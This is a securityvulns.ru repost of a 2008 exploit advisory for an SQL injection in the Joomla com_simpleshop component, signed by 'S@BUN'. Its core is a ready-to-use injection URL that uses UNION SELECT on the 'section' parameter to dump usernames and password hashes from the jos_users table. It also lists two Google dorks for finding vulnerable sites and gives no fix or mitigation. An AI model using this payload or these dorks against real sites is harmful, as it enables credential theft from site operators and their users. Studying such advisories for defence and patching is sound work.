Computer Security

Security Advisory: joomla com_simpleshop SQL Injection(section) #
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1507-1] New turba2 packages fix permission testing

  Powered by Pagetool Ver (1.04-05-06-
07)

  Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

  Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

From:hackturkiye.hackturkiye_(at)_gmail.com <hackturkiye.hackturkiye_(at)_gmail.com>
Date:26.02.2008
Subject:joomla com_simpleshop SQL Injection(section) #

###############################################################
#
#   joomla com_simpleshop SQL Injection(section)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MAİL : hackturkiye.hackturkiye@gmail.com
#        
################################################################
#
#  DORK 1 : allinurl:"com_simpleshop"
#
#  DORK 2 : allinurl: "com_simpleshop"section
#
################################################################
  EXPLOIT :

index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-
000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,
concat(username,0x3a,password)/**/from/**/jos_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN
################################################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru